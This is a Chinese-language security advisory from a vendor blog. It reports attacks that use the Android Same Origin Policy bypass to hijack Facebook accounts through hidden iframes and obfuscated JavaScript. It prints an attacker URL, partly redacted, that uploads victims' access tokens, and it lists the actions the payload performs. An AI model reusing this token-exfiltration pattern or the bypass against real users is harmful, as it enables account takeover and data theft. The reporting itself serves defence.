趨勢科技在幾個月前討論過Android同源政策(Same Origin Policy)漏洞,我們後來發現它比預想中還要更廣泛地出現。現在,在趨勢科技和Facebook合作下,發現有攻擊在積極地利用此一漏洞,我們相信其所使用的程式碼是基於公開的Metasploit程式碼。
此次攻擊針對Facebook使用者,透過一特定Facebook網頁上的連結來導到惡意網站。此網頁包含混淆處理過的JavaScript程式碼(見圖1),試圖在內部框架中載入一個Facebook網址(如圖2)。使用者只會看到空白頁面,因為網頁語法已經透過div標籤來設成不顯示任何東西(圖3),而內部框架的大小僅有一個像素(圖4)。
圖1、打開Facebook網頁內的惡意軟體程式碼片段
圖2、Facebook網頁的相應內容
圖3、主網頁被設為不可見
圖4、內部框架的大小為一個像素
當這些不正常行為進行的同時,同源政策繞過也在執行。從正常雲端儲存服務載入一個遠端JavaScript檔案:
圖5、執行同源政策繞過的JavaScript檔
上述檔案含此攻擊的惡意程式碼,並讓攻擊者可以在Facebook上進行下列活動:
- 加朋友
- 按讚和加入 Facebook 粉絲頁
- 修改訂閱
- 授權Facebook應用程式來存取使用者的公開個人檔案、好友列表、生日資訊,自己和朋友的按讚內容
- 竊取受害者的存取權杖(token)並將其上載到伺服器
https://{BLOCKED}martforchristmas.website/walmart/j/index.php?cid=544fba6ac6988&access_token= $token; - 利用正常服務https://whos.{BLOCKED}ung.us/pingjs/來收集分析資料(如受害者位置,HTTP referrer等)
除了在上述網站的程式碼外,我們也在https://www.{BLOCKED}php.com/x/toplu.php發現類似攻擊。我們相信它們來自同一個作者,因為它們共用了幾個函數名稱以及Facebook應用程式的client_id。
什麼應用程式被授權?
跟此惡意軟體相關的client_id是「2254487659」。這是BlackBerry所維護的官方BlackBerry應用程式。我們和BlackBerry確認並證實此惡意軟體試圖利用BlackBerry的品牌信任感並竊取使用者存取權杖(token),以用來對Facebook API發出請求,讀取使用者資訊或代表使用者發佈內容到Facebook。BlackBerry發表了以下聲明:
「利用Android SOP漏洞(Android同源政策繞過漏洞)的行動惡意軟體被設計來在各種行動裝置平台上針對Facebook使用者。它也試圖利用我們的 Facebook網頁應用程式以濫用 BlackBerry品牌信任感。BlackBerry 持續地和趨勢科技與 Facebook合作來偵測和消除此種攻擊。請注意,此一問題並非針對BlackBerry的硬體、軟體或網路漏洞攻擊所造成。」
我們在之前的文章裡提到Google已經發表此一漏洞的修復程式。然而,並非所有使用者都能夠更新他們的瀏覽器或Android版本。在手機廠商釋出修復程式前,使用者仍將面臨危險。
此次攻擊相關的威脅被趨勢科技偵測為JS_ANDRSOPEXP.A和HTML_ANDRSOPEXP.A。
@原文出處:Facebook Users Targeted By Android Same Origin Policy Exploit作者:Simon Huang(行動安全工程師)